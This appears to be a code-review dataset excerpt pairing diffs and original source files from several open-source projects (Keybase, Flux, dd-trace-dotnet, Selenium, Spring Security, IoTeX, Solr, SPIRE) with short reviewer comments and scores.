updatedWriterKeys := UserDevicePublicKeys{
uid1: {},
uid2: {},
}
updatedReaderKeys := UserDevicePublicKeys{
uid3: {},
}
tlfID := tlf.FakeID(1, false)
bh, err := tlf.MakeHandle(
[]keybase1.UID{uid1, uid2}, []keybase1.UID{uid3},
[]keybase1.SocialAssertion{{}},
nil, nil)
require.NoError(t, err)
rmd, err := MakeInitialBareRootMetadataV3(tlfID, bh)
require.NoError(t, err)
codec := kbfscodec.NewMsgpack()
crypto := MakeCryptoCommon(codec)
ePubKey1, ePrivKey1, err := crypto.MakeRandomTLFEphemeralKeys()
require.NoError(t, err)
// Add first key generation.
fakeKeyData := [32]byte{1}
pubKey := kbfscrypto.MakeTLFPublicKey(fakeKeyData)
tlfCryptKey := kbfscrypto.MakeTLFCryptKey(fakeKeyData)
extra, serverHalves1, err := rmd.AddKeyGeneration(codec,
crypto, nil, updatedWriterKeys, updatedReaderKeys,
ePubKey1, ePrivKey1,
pubKey, kbfscrypto.TLFCryptKey{}, tlfCryptKey)
require.NoError(t, err)
wkb, rkb, err := rmd.getTLFKeyBundles(extra)
require.NoError(t, err)
expectedRekeyInfo1 := expectedRekeyInfoV3{
writerPrivKeys: userDevicePrivateKeys{
uid1: {},
uid2: {},
},
readerPrivKeys: userDevicePrivateKeys{
uid3: {},
},
serverHalves: serverHalves1,
}
expectedRekeyInfos := []expectedRekeyInfoV3{expectedRekeyInfo1}
checkKeyBundlesV3(t, expectedRekeyInfos, tlfCryptKey, pubKey, wkb, rkb)
}
| 1 | 16,906 | Do you think we should have some tests here for `tlf.SingleTeam` too? | keybase-kbfs | go |
@@ -1,6 +1,8 @@
package table
-import "github.com/influxdata/flux"
+import (
+ "github.com/influxdata/flux"
+)
// Copy returns a buffered copy of the table and consumes the
// input table. If the input table is already buffered, it "consumes" | 1 | package table
import "github.com/influxdata/flux"
// Copy returns a buffered copy of the table and consumes the
// input table. If the input table is already buffered, it "consumes"
// the input and returns the same table.
//
// The buffered table can then be copied additional times using the
// BufferedTable.Copy method.
//
// This method should be used sparingly if at all. It will retain
// each of the buffers of data coming out of a table so the entire
// table is materialized in memory. For large datasets, this could
// potentially cause a problem. The allocator is meant to catch when
// this happens and prevent it.
func Copy(t flux.Table) (flux.BufferedTable, error) {
if tbl, ok := t.(flux.BufferedTable); ok {
return tbl, nil
}
tbl := tableBuffer{
key: t.Key(),
colMeta: t.Cols(),
}
if t.Empty() {
return &tbl, nil
}
if err := t.Do(func(cr flux.ColReader) error {
cr.Retain()
tbl.buffers = append(tbl.buffers, cr)
return nil
}); err != nil {
tbl.Done()
return nil, err
}
return &tbl, nil
}
// tableBuffer maintains a buffer of the data within a table.
// It is created by reading a table and using Retain to retain
// a reference to each ColReader that is returned.
//
// This implements the flux.BufferedTable interface.
type tableBuffer struct {
key flux.GroupKey
colMeta []flux.ColMeta
i int
buffers []flux.ColReader
}
func (tb *tableBuffer) Key() flux.GroupKey {
return tb.key
}
func (tb *tableBuffer) Cols() []flux.ColMeta {
return tb.colMeta
}
func (tb *tableBuffer) Do(f func(flux.ColReader) error) error {
defer tb.Done()
for ; tb.i < len(tb.buffers); tb.i++ {
b := tb.buffers[tb.i]
if err := f(b); err != nil {
return err
}
b.Release()
}
return nil
}
func (tb *tableBuffer) Done() {
for ; tb.i < len(tb.buffers); tb.i++ {
tb.buffers[tb.i].Release()
}
}
func (tb *tableBuffer) Empty() bool {
return len(tb.buffers) == 0
}
func (tb *tableBuffer) Buffer(i int) flux.ColReader {
return tb.buffers[i]
}
func (tb *tableBuffer) BufferN() int {
return len(tb.buffers)
}
func (tb *tableBuffer) Copy() flux.BufferedTable {
for i := tb.i; i < len(tb.buffers); i++ {
tb.buffers[i].Retain()
}
return &tableBuffer{
key: tb.key,
colMeta: tb.colMeta,
i: tb.i,
buffers: tb.buffers,
}
}
| 1 | 15,878 | No problem with this but might as well revert this file since nothing else changed. | influxdata-flux | go |
@@ -14,18 +14,7 @@ namespace Datadog.Trace.ClrProfiler.Integrations
/// </summary>
public static void Register()
{
- Tracer.Instance = new Tracer(
- settings: null,
- agentWriter: null,
- sampler: null,
- scopeManager: new AspNetScopeManager(),
- statsd: null);
-
- if (Tracer.Instance.Settings.IsIntegrationEnabled(AspNetHttpModule.IntegrationName))
- {
- // only register http module if integration is enabled
- HttpApplication.RegisterModule(typeof(AspNetHttpModule));
- }
+ HttpApplication.RegisterModule(typeof(AspNetHttpModule));
}
}
} | 1 | #if !NETSTANDARD2_0
using System.Web;
namespace Datadog.Trace.ClrProfiler.Integrations
{
/// <summary>
/// Used as the target of a PreApplicationStartMethodAttribute on the assembly to load the AspNetHttpModule into the pipeline
/// </summary>
public static class AspNetStartup
{
/// <summary>
/// Registers the AspNetHttpModule at ASP.NET startup into the pipeline
/// </summary>
public static void Register()
{
Tracer.Instance = new Tracer(
settings: null,
agentWriter: null,
sampler: null,
scopeManager: new AspNetScopeManager(),
statsd: null);
if (Tracer.Instance.Settings.IsIntegrationEnabled(AspNetHttpModule.IntegrationName))
{
// only register http module if integration is enabled
HttpApplication.RegisterModule(typeof(AspNetHttpModule));
}
}
}
}
#endif
| 1 | 16,092 | In my changes, I did not create a new `AspNetScopeManager`. I'm not familiar with it enough to know if this is a valid change or not | DataDog-dd-trace-dotnet | .cs |
@@ -0,0 +1,3 @@
+export default message => {
+ throw new Error(message);
+}; | 1 | 1 | 5,570 | Not cool with this. I think we talked about it in past. This is a side effect. If we want to introduce the side effect in our functions like `inRange` (which I am for) the side effect (error) should originate in that function and not in some internal `throwError` function. Every stacktract will start at line `2` of `trowError.js`. Been there, done that and falled back to throwing the error from the place where it should be thrown. | char0n-ramda-adjunct | js |
|
@@ -25,6 +25,9 @@ public interface Span extends AutoCloseable, TraceContext {
Span setAttribute(String key, Number value);
Span setAttribute(String key, String value);
+ Span addEvent(String name);
+ Span addEvent(String name, long timestamp);
+
Span setStatus(Status status);
@Override | 1 | // Licensed to the Software Freedom Conservancy (SFC) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The SFC licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
package org.openqa.selenium.remote.tracing;
public interface Span extends AutoCloseable, TraceContext {
Span setName(String name);
Span setAttribute(String key, boolean value);
Span setAttribute(String key, Number value);
Span setAttribute(String key, String value);
Span setStatus(Status status);
@Override
void close();
enum Kind {
CLIENT("client"),
SERVER("server"),
PRODUCER("producer"),
CONSUMER("consumer"),
;
// The nice name is the name expected in an OT trace.
private final String niceName;
private Kind(String niceName) {
this.niceName = niceName;
}
@Override
public String toString() {
return niceName;
}
}
}
| 1 | 17,759 | We don't need this additional method. | SeleniumHQ-selenium | js |
@@ -44,11 +44,10 @@ public class DelegatingOAuth2UserServiceTests {
}
@Test(expected = IllegalArgumentException.class)
- @SuppressWarnings("unchecked")
public void loadUserWhenUserRequestIsNullThenThrowIllegalArgumentException() {
DelegatingOAuth2UserService<OAuth2UserRequest, OAuth2User> delegatingUserService =
new DelegatingOAuth2UserService<>(
- Arrays.asList(mock(OAuth2UserService.class), mock(OAuth2UserService.class)));
+ Arrays.asList(mock(DefaultOAuth2UserService.class), mock(DefaultOAuth2UserService.class)));
delegatingUserService.loadUser(null);
}
| 1 | /*
* Copyright 2002-2017 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.security.oauth2.client.userinfo;
import org.junit.Test;
import org.springframework.security.oauth2.core.user.OAuth2User;
import java.util.Arrays;
import java.util.Collections;
import static org.assertj.core.api.Assertions.assertThat;
import static org.mockito.ArgumentMatchers.any;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.when;
/**
* Tests for {@link DelegatingOAuth2UserService}.
*
* @author Joe Grandja
*/
public class DelegatingOAuth2UserServiceTests {
@Test(expected = IllegalArgumentException.class)
public void constructorWhenUserServicesIsNullThenThrowIllegalArgumentException() {
new DelegatingOAuth2UserService<>(null);
}
@Test(expected = IllegalArgumentException.class)
public void constructorWhenUserServicesIsEmptyThenThrowIllegalArgumentException() {
new DelegatingOAuth2UserService<>(Collections.emptyList());
}
@Test(expected = IllegalArgumentException.class)
@SuppressWarnings("unchecked")
public void loadUserWhenUserRequestIsNullThenThrowIllegalArgumentException() {
DelegatingOAuth2UserService<OAuth2UserRequest, OAuth2User> delegatingUserService =
new DelegatingOAuth2UserService<>(
Arrays.asList(mock(OAuth2UserService.class), mock(OAuth2UserService.class)));
delegatingUserService.loadUser(null);
}
@Test
@SuppressWarnings("unchecked")
public void loadUserWhenUserServiceCanLoadThenReturnUser() {
OAuth2UserService<OAuth2UserRequest, OAuth2User> userService1 = mock(OAuth2UserService.class);
OAuth2UserService<OAuth2UserRequest, OAuth2User> userService2 = mock(OAuth2UserService.class);
OAuth2UserService<OAuth2UserRequest, OAuth2User> userService3 = mock(OAuth2UserService.class);
OAuth2User mockUser = mock(OAuth2User.class);
when(userService3.loadUser(any(OAuth2UserRequest.class))).thenReturn(mockUser);
DelegatingOAuth2UserService<OAuth2UserRequest, OAuth2User> delegatingUserService =
new DelegatingOAuth2UserService<>(Arrays.asList(userService1, userService2, userService3));
OAuth2User loadedUser = delegatingUserService.loadUser(mock(OAuth2UserRequest.class));
assertThat(loadedUser).isEqualTo(mockUser);
}
@Test
@SuppressWarnings("unchecked")
public void loadUserWhenUserServiceCannotLoadThenReturnNull() {
OAuth2UserService<OAuth2UserRequest, OAuth2User> userService1 = mock(OAuth2UserService.class);
OAuth2UserService<OAuth2UserRequest, OAuth2User> userService2 = mock(OAuth2UserService.class);
OAuth2UserService<OAuth2UserRequest, OAuth2User> userService3 = mock(OAuth2UserService.class);
DelegatingOAuth2UserService<OAuth2UserRequest, OAuth2User> delegatingUserService =
new DelegatingOAuth2UserService<>(Arrays.asList(userService1, userService2, userService3));
OAuth2User loadedUser = delegatingUserService.loadUser(mock(OAuth2UserRequest.class));
assertThat(loadedUser).isNull();
}
}
| 1 | 10,002 | The purpose of this test is to ensure that the `OAuth2UserRequest` passed into `loadUser` is **not** null else throw `IllegalArgumentException`. Changing the `List` of `OAuth2UserService` mocks to `DefaultOAuth2UserService` doesn't really apply to what is being tested here. Please revert this. Thank you. | spring-projects-spring-security | java |
@@ -124,7 +124,7 @@ func NewProtocol(
getkickoutList GetKickoutList,
getUnproductiveDelegate GetUnproductiveDelegate,
electionCommittee committee.Committee,
- stakingV2 *staking.Protocol,
+ stakingProto *staking.Protocol,
getBlockTimeFunc GetBlockTime,
productivity Productivity,
getBlockHash evm.GetBlockHash, | 1 | // Copyright (c) 2019 IoTeX Foundation
// This is an alpha (internal) release and is not suitable for production. This source code is provided 'as is' and no
// warranties are given as to title or non-infringement, merchantability or fitness for purpose and, to the extent
// permitted by law, all liability for your use of the code is disclaimed. This source code is governed by Apache
// License 2.0 that can be found in the LICENSE file.
package poll
import (
"context"
"math/big"
"time"
"github.com/iotexproject/iotex-election/committee"
"github.com/pkg/errors"
"github.com/iotexproject/iotex-core/action/protocol"
"github.com/iotexproject/iotex-core/action/protocol/execution/evm"
"github.com/iotexproject/iotex-core/action/protocol/staking"
"github.com/iotexproject/iotex-core/action/protocol/vote"
"github.com/iotexproject/iotex-core/config"
"github.com/iotexproject/iotex-core/pkg/log"
"github.com/iotexproject/iotex-core/state"
)
const (
protocolID = "poll"
)
const (
_modeLifeLong = "lifeLong"
_modeGovernanceMix = "governanceMix" // mix governance with native staking contract
_modeNative = "native" // only use go naitve staking
_modeNativeMix = "nativeMix" // native with backward compatibility for governanceMix before fairbank
_modeConsortium = "consortium"
)
// ErrInconsistentHeight is an error that result of "readFromStateDB" is not consistent with others
var ErrInconsistentHeight = errors.New("data is inconsistent because the state height has been changed")
// ErrNoElectionCommittee is an error that the election committee is not specified
var ErrNoElectionCommittee = errors.New("no election committee specified")
// ErrProposedDelegatesLength is an error that the proposed delegate list length is not right
var ErrProposedDelegatesLength = errors.New("the proposed delegate list length")
// ErrDelegatesNotAsExpected is an error that the delegates are not as expected
var ErrDelegatesNotAsExpected = errors.New("delegates are not as expected")
// ErrDelegatesNotExist is an error that the delegates cannot be prepared
var ErrDelegatesNotExist = errors.New("delegates cannot be found")
// CandidatesByHeight returns the candidates of a given height
type CandidatesByHeight func(protocol.StateReader, uint64) ([]*state.Candidate, error)
// GetCandidates returns the current candidates
type GetCandidates func(protocol.StateReader, bool) ([]*state.Candidate, uint64, error)
// GetKickoutList returns current the blacklist
type GetKickoutList func(protocol.StateReader, bool) (*vote.Blacklist, uint64, error)
// GetUnproductiveDelegate returns unproductiveDelegate struct which contains a cache of upd info by epochs
type GetUnproductiveDelegate func(protocol.StateReader) (*vote.UnproductiveDelegate, error)
// GetBlockTime defines a function to get block creation time
type GetBlockTime func(uint64) (time.Time, error)
// Productivity returns the number of produced blocks per producer
type Productivity func(uint64, uint64) (map[string]uint64, error)
// Protocol defines the protocol of handling votes
type Protocol interface {
protocol.Protocol
protocol.GenesisStateCreator
Delegates(context.Context, protocol.StateReader) (state.CandidateList, error)
NextDelegates(context.Context, protocol.StateReader) (state.CandidateList, error)
Candidates(context.Context, protocol.StateReader) (state.CandidateList, error)
NextCandidates(context.Context, protocol.StateReader) (state.CandidateList, error)
// CalculateCandidatesByHeight calculates candidate and returns candidates by chain height
CalculateCandidatesByHeight(context.Context, uint64) (state.CandidateList, error)
}
// FindProtocol finds the registered protocol from registry
func FindProtocol(registry *protocol.Registry) Protocol {
if registry == nil {
return nil
}
p, ok := registry.Find(protocolID)
if !ok {
return nil
}
pp, ok := p.(Protocol)
if !ok {
log.S().Panic("fail to cast poll protocol")
}
return pp
}
// MustGetProtocol return a registered protocol from registry
func MustGetProtocol(registry *protocol.Registry) Protocol {
if registry == nil {
log.S().Panic("registry cannot be nil")
}
p, ok := registry.Find(protocolID)
if !ok {
log.S().Panic("poll protocol is not registered")
}
pp, ok := p.(Protocol)
if !ok {
log.S().Panic("fail to cast poll protocol")
}
return pp
}
// NewProtocol instantiates a rewarding protocol instance.
func NewProtocol(
cfg config.Config,
candidateIndexer *CandidateIndexer,
readContract ReadContract,
candidatesByHeight CandidatesByHeight,
getCandidates GetCandidates,
getkickoutList GetKickoutList,
getUnproductiveDelegate GetUnproductiveDelegate,
electionCommittee committee.Committee,
stakingV2 *staking.Protocol,
getBlockTimeFunc GetBlockTime,
productivity Productivity,
getBlockHash evm.GetBlockHash,
) (Protocol, error) {
genesisConfig := cfg.Genesis
if cfg.Consensus.Scheme != config.RollDPoSScheme {
return nil, nil
}
switch genesisConfig.PollMode {
case _modeLifeLong:
delegates := genesisConfig.Delegates
if uint64(len(delegates)) < genesisConfig.NumDelegates {
return nil, errors.New("invalid delegate address in genesis block")
}
return NewLifeLongDelegatesProtocol(delegates), nil
case _modeGovernanceMix:
if !genesisConfig.EnableGravityChainVoting || electionCommittee == nil {
return nil, errors.New("gravity chain voting is not enabled")
}
slasher, err := NewSlasher(
&genesisConfig,
productivity,
candidatesByHeight,
getCandidates,
getkickoutList,
getUnproductiveDelegate,
candidateIndexer,
genesisConfig.NumCandidateDelegates,
genesisConfig.NumDelegates,
genesisConfig.ProductivityThreshold,
genesisConfig.KickoutEpochPeriod,
genesisConfig.UnproductiveDelegateMaxCacheSize,
genesisConfig.KickoutIntensityRate)
if err != nil {
return nil, err
}
governance, err := NewGovernanceChainCommitteeProtocol(
candidateIndexer,
electionCommittee,
genesisConfig.GravityChainStartHeight,
getBlockTimeFunc,
cfg.Chain.PollInitialCandidatesInterval,
slasher,
)
if err != nil {
return nil, err
}
scoreThreshold, ok := new(big.Int).SetString(cfg.Genesis.ScoreThreshold, 10)
if !ok {
return nil, errors.Errorf("failed to parse score threshold %s", cfg.Genesis.ScoreThreshold)
}
return NewStakingCommittee(
electionCommittee,
governance,
readContract,
cfg.Genesis.NativeStakingContractAddress,
cfg.Genesis.NativeStakingContractCode,
scoreThreshold,
)
case _modeNative:
// TODO
return nil, errors.New("not implemented")
case _modeNativeMix:
// TODO
return nil, errors.New("not implemented")
case _modeConsortium:
return NewConsortiumCommittee(candidateIndexer, readContract, getBlockHash)
default:
return nil, errors.Errorf("unsupported poll mode %s", genesisConfig.PollMode)
}
}
| 1 | 21,455 | nit: rename to nativeStk? proto might lead to think protobuf | iotexproject-iotex-core | go |
@@ -28,6 +28,9 @@ import org.apache.solr.common.util.StrUtils;
public interface ShardParams {
/** the shards to use (distributed configuration) */
String SHARDS = "shards";
+
+ /** UUID of the query */
+ String QUERY_ID = "queryID";
/** per-shard start and rows */
String SHARDS_ROWS = "shards.rows"; | 1 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.solr.common.params;
import org.apache.solr.common.util.StrUtils;
/**
* Parameters used for distributed search.
*
* When adding a new parameter here, please also add the corresponding
* one-line test case in the ShardParamsTest class.
*
*/
public interface ShardParams {
/** the shards to use (distributed configuration) */
String SHARDS = "shards";
/** per-shard start and rows */
String SHARDS_ROWS = "shards.rows";
String SHARDS_START = "shards.start";
/** IDs of the shard documents */
String IDS = "ids";
/** whether the request goes to a shard */
String IS_SHARD = "isShard";
/** The requested URL for this shard */
String SHARD_URL = "shard.url";
/** The requested shard name */
String SHARD_NAME = "shard.name";
/** The Request Handler for shard requests */
String SHARDS_QT = "shards.qt";
/** Request detailed match info for each shard (true/false) */
String SHARDS_INFO = "shards.info";
/** Should things fail if there is an error? (true/false/{@value #REQUIRE_ZK_CONNECTED}) */
String SHARDS_TOLERANT = "shards.tolerant";
/** query purpose for shard requests */
String SHARDS_PURPOSE = "shards.purpose";
/** Shards sorting rules */
String SHARDS_PREFERENCE = "shards.preference";
/** Replica type sort rule */
String SHARDS_PREFERENCE_REPLICA_TYPE = "replica.type";
/** Replica location sort rule */
String SHARDS_PREFERENCE_REPLICA_LOCATION = "replica.location";
/** Node with same system property sort rule */
String SHARDS_PREFERENCE_NODE_WITH_SAME_SYSPROP = "node.sysprop";
/** Replica base/fallback sort rule */
String SHARDS_PREFERENCE_REPLICA_BASE = "replica.base";
/** Value denoting local replicas */
String REPLICA_LOCAL = "local";
/** Value denoting randomized replica sort */
String REPLICA_RANDOM = "random";
/** Value denoting stable replica sort */
String REPLICA_STABLE = "stable";
/** configure dividend param for stable replica sort */
String ROUTING_DIVIDEND = "dividend";
/** configure hash param for stable replica sort */
String ROUTING_HASH = "hash";
String _ROUTE_ = "_route_";
/** Force a single-pass distributed query? (true/false) */
String DISTRIB_SINGLE_PASS = "distrib.singlePass";
/**
* Throw an error from search requests when the {@value #SHARDS_TOLERANT} param
* has this value and ZooKeeper is not connected.
*
* @see #getShardsTolerantAsBool(SolrParams)
*/
String REQUIRE_ZK_CONNECTED = "requireZkConnected";
/**
* Parse the {@value #SHARDS_TOLERANT} param from <code>params</code> as a boolean;
* accepts {@value #REQUIRE_ZK_CONNECTED} as a valid value indicating <code>false</code>.
*
* By default, returns <code>false</code> when {@value #SHARDS_TOLERANT} is not set
* in <code>params</code>.
*/
static boolean getShardsTolerantAsBool(SolrParams params) {
String shardsTolerantValue = params.get(SHARDS_TOLERANT);
if (null == shardsTolerantValue || shardsTolerantValue.equals(REQUIRE_ZK_CONNECTED)) {
return false;
} else {
return StrUtils.parseBool(shardsTolerantValue); // throw an exception if non-boolean
}
}
}
| 1 | 40,483 | Why not `queryUUID` (and reference the same constant as in other places)? | apache-lucene-solr | java |
@@ -36,9 +36,9 @@ import (
)
const (
- invalidTrustDomainAttestedNode = "An attested node with trust domain '%v' has been detected, " +
+ invalidTrustDomainAttestedNode = "an attested node with trust domain '%v' has been detected, " +
"which does not match the configured trust domain of '%v'. Agents may need to be reconfigured to use new trust domain"
- invalidTrustDomainRegistrationEntry = "A registration entry with trust domain '%v' has been detected, " +
+ invalidTrustDomainRegistrationEntry = "a registration entry with trust domain '%v' has been detected, " +
"which does not match the configured trust domain of '%v'. If you want to change the trust domain, " +
"please delete all existing registration entries"
invalidSpiffeIDRegistrationEntry = "registration entry with id %v is malformed because invalid SPIFFE ID: %v" | 1 | package server
import (
"context"
"errors"
"fmt"
"net/http"
_ "net/http/pprof" //nolint: gosec // import registers routes on DefaultServeMux
"net/url"
"os"
"runtime"
"sync"
"github.com/andres-erbsen/clock"
bundlev1 "github.com/spiffe/spire-api-sdk/proto/spire/api/server/bundle/v1"
server_util "github.com/spiffe/spire/cmd/spire-server/util"
"github.com/spiffe/spire/pkg/common/health"
"github.com/spiffe/spire/pkg/common/hostservice/metricsservice"
"github.com/spiffe/spire/pkg/common/profiling"
"github.com/spiffe/spire/pkg/common/telemetry"
"github.com/spiffe/spire/pkg/common/uptime"
"github.com/spiffe/spire/pkg/common/util"
bundle_client "github.com/spiffe/spire/pkg/server/bundle/client"
"github.com/spiffe/spire/pkg/server/ca"
"github.com/spiffe/spire/pkg/server/catalog"
"github.com/spiffe/spire/pkg/server/endpoints"
"github.com/spiffe/spire/pkg/server/hostservice/agentstore"
"github.com/spiffe/spire/pkg/server/hostservice/identityprovider"
"github.com/spiffe/spire/pkg/server/plugin/datastore"
"github.com/spiffe/spire/pkg/server/registration"
"github.com/spiffe/spire/pkg/server/svid"
metricsv0 "github.com/spiffe/spire/proto/spire/hostservice/common/metrics/v0"
agentstorev0 "github.com/spiffe/spire/proto/spire/hostservice/server/agentstore/v0"
identityproviderv0 "github.com/spiffe/spire/proto/spire/hostservice/server/identityprovider/v0"
"google.golang.org/grpc"
)
const (
invalidTrustDomainAttestedNode = "An attested node with trust domain '%v' has been detected, " +
"which does not match the configured trust domain of '%v'. Agents may need to be reconfigured to use new trust domain"
invalidTrustDomainRegistrationEntry = "A registration entry with trust domain '%v' has been detected, " +
"which does not match the configured trust domain of '%v'. If you want to change the trust domain, " +
"please delete all existing registration entries"
invalidSpiffeIDRegistrationEntry = "registration entry with id %v is malformed because invalid SPIFFE ID: %v"
invalidSpiffeIDAttestedNode = "could not parse SPIFFE ID, from attested node"
pageSize = 1
)
type Server struct {
config Config
}
// Run the server
// This method initializes the server, including its plugins,
// and then blocks until it's shut down or an error is encountered.
func (s *Server) Run(ctx context.Context) error {
if err := s.run(ctx); err != nil {
s.config.Log.WithError(err).Error("Fatal run error")
return err
}
return nil
}
func (s *Server) run(ctx context.Context) (err error) {
// create the data directory if needed
s.config.Log.Infof("Data directory: %q", s.config.DataDir)
if err := os.MkdirAll(s.config.DataDir, 0755); err != nil {
return err
}
if s.config.ProfilingEnabled {
stopProfiling := s.setupProfiling(ctx)
defer stopProfiling()
}
metrics, err := telemetry.NewMetrics(&telemetry.MetricsConfig{
FileConfig: s.config.Telemetry,
Logger: s.config.Log.WithField(telemetry.SubsystemName, telemetry.Telemetry),
ServiceName: telemetry.SpireServer,
})
if err != nil {
return err
}
metricsService := metricsservice.New(metricsservice.Config{
Metrics: metrics,
})
telemetry.EmitVersion(metrics)
uptime.ReportMetrics(ctx, metrics)
// Create the identity provider host service. It will not be functional
// until the call to SetDeps() below. There is some tricky initialization
// stuff going on since the identity provider host service requires plugins
// to do its job. RPC's from plugins to the identity provider before
// SetDeps() has been called will fail with a PreCondition status.
identityProvider := identityprovider.New(identityprovider.Config{
TrustDomainID: s.config.TrustDomain.IDString(),
})
// Create the agent store host service. It will not be functional
// until the call to SetDeps() below.
agentStore := agentstore.New()
cat, err := s.loadCatalog(ctx, metrics, identityProvider, agentStore, metricsService)
if err != nil {
return err
}
defer cat.Close()
healthChecker := health.NewChecker(s.config.HealthChecks, s.config.Log)
s.config.Log.Info("Plugins started")
err = s.validateTrustDomain(ctx, cat.GetDataStore())
if err != nil {
return err
}
serverCA := s.newCA(metrics, healthChecker)
// CA manager needs to be initialized before the rotator, otherwise the
// server CA plugin won't be able to sign CSRs
caManager, err := s.newCAManager(ctx, cat, metrics, serverCA, healthChecker)
if err != nil {
return err
}
svidRotator, err := s.newSVIDRotator(ctx, serverCA, metrics)
if err != nil {
return err
}
endpointsServer, err := s.newEndpointsServer(ctx, cat, svidRotator, serverCA, metrics, caManager)
if err != nil {
return err
}
// Set the identity provider dependencies
if err := identityProvider.SetDeps(identityprovider.Deps{
DataStore: cat.GetDataStore(),
X509IdentityFetcher: identityprovider.X509IdentityFetcherFunc(func(context.Context) (*identityprovider.X509Identity, error) {
// Return the server identity itself
state := svidRotator.State()
return &identityprovider.X509Identity{
CertChain: state.SVID,
PrivateKey: state.Key,
}, nil
}),
}); err != nil {
return fmt.Errorf("failed setting IdentityProvider deps: %v", err)
}
// Set the agent store dependencies
if err := agentStore.SetDeps(agentstore.Deps{
DataStore: cat.GetDataStore(),
}); err != nil {
return fmt.Errorf("failed setting AgentStore deps: %v", err)
}
bundleManager := s.newBundleManager(cat, metrics)
registrationManager := s.newRegistrationManager(cat, metrics)
if err := healthChecker.AddCheck("server", s); err != nil {
return fmt.Errorf("failed adding healthcheck: %v", err)
}
err = util.RunTasks(ctx,
caManager.Run,
svidRotator.Run,
endpointsServer.ListenAndServe,
metrics.ListenAndServe,
bundleManager.Run,
registrationManager.Run,
util.SerialRun(s.waitForTestDial, healthChecker.ListenAndServe),
scanForBadEntries(s.config.Log, metrics, cat.GetDataStore()),
)
if err == context.Canceled {
err = nil
}
return err
}
func (s *Server) setupProfiling(ctx context.Context) (stop func()) {
ctx, cancel := context.WithCancel(ctx)
var wg sync.WaitGroup
if runtime.MemProfileRate == 0 {
s.config.Log.Warn("Memory profiles are disabled")
}
if s.config.ProfilingPort > 0 {
grpc.EnableTracing = true
server := http.Server{
Addr: fmt.Sprintf("localhost:%d", s.config.ProfilingPort),
Handler: http.DefaultServeMux,
}
// kick off a goroutine to serve the pprof endpoints and one to
// gracefully shut down the server when profiling is being torn down
wg.Add(1)
go func() {
defer wg.Done()
if err := server.ListenAndServe(); err != nil {
s.config.Log.WithError(err).Warn("Unable to serve profiling server")
}
}()
wg.Add(1)
go func() {
defer wg.Done()
<-ctx.Done()
if err := server.Shutdown(ctx); err != nil {
s.config.Log.WithError(err).Warn("Unable to shutdown the server cleanly")
}
}()
}
if s.config.ProfilingFreq > 0 {
c := &profiling.Config{
Tag: "server",
Frequency: s.config.ProfilingFreq,
DebugLevel: 0,
RunGCBeforeHeapProfile: true,
Profiles: s.config.ProfilingNames,
}
wg.Add(1)
go func() {
defer wg.Done()
if err := profiling.Run(ctx, c); err != nil {
s.config.Log.WithError(err).Warn("Failed to run profiling")
}
}()
}
return func() {
cancel()
wg.Wait()
}
}
func (s *Server) loadCatalog(ctx context.Context, metrics telemetry.Metrics, identityProvider identityproviderv0.IdentityProviderServer, agentStore agentstorev0.AgentStoreServer,
metricsService metricsv0.MetricsServiceServer) (*catalog.Repository, error) {
return catalog.Load(ctx, catalog.Config{
Log: s.config.Log.WithField(telemetry.SubsystemName, telemetry.Catalog),
GlobalConfig: &catalog.GlobalConfig{
TrustDomain: s.config.TrustDomain.String(),
},
PluginConfig: s.config.PluginConfigs,
Metrics: metrics,
IdentityProvider: identityProvider,
AgentStore: agentStore,
MetricsService: metricsService,
})
}
func (s *Server) newCA(metrics telemetry.Metrics, healthChecker health.Checker) *ca.CA {
return ca.NewCA(ca.Config{
Log: s.config.Log.WithField(telemetry.SubsystemName, telemetry.CA),
Metrics: metrics,
X509SVIDTTL: s.config.SVIDTTL,
JWTIssuer: s.config.JWTIssuer,
TrustDomain: s.config.TrustDomain,
CASubject: s.config.CASubject,
HealthChecker: healthChecker,
})
}
func (s *Server) newCAManager(ctx context.Context, cat catalog.Catalog, metrics telemetry.Metrics, serverCA *ca.CA, healthChecker health.Checker) (*ca.Manager, error) {
caManager := ca.NewManager(ca.ManagerConfig{
CA: serverCA,
Catalog: cat,
TrustDomain: s.config.TrustDomain,
Log: s.config.Log.WithField(telemetry.SubsystemName, telemetry.CAManager),
Metrics: metrics,
CATTL: s.config.CATTL,
CASubject: s.config.CASubject,
Dir: s.config.DataDir,
X509CAKeyType: s.config.CAKeyType,
JWTKeyType: s.config.JWTKeyType,
HealthChecker: healthChecker,
})
if err := caManager.Initialize(ctx); err != nil {
return nil, err
}
return caManager, nil
}
func (s *Server) newRegistrationManager(cat catalog.Catalog, metrics telemetry.Metrics) *registration.Manager {
registrationManager := registration.NewManager(registration.ManagerConfig{
DataStore: cat.GetDataStore(),
Log: s.config.Log.WithField(telemetry.SubsystemName, telemetry.RegistrationManager),
Metrics: metrics,
})
return registrationManager
}
func (s *Server) newSVIDRotator(ctx context.Context, serverCA ca.ServerCA, metrics telemetry.Metrics) (*svid.Rotator, error) {
svidRotator := svid.NewRotator(&svid.RotatorConfig{
ServerCA: serverCA,
Log: s.config.Log.WithField(telemetry.SubsystemName, telemetry.SVIDRotator),
Metrics: metrics,
TrustDomain: s.config.TrustDomain,
})
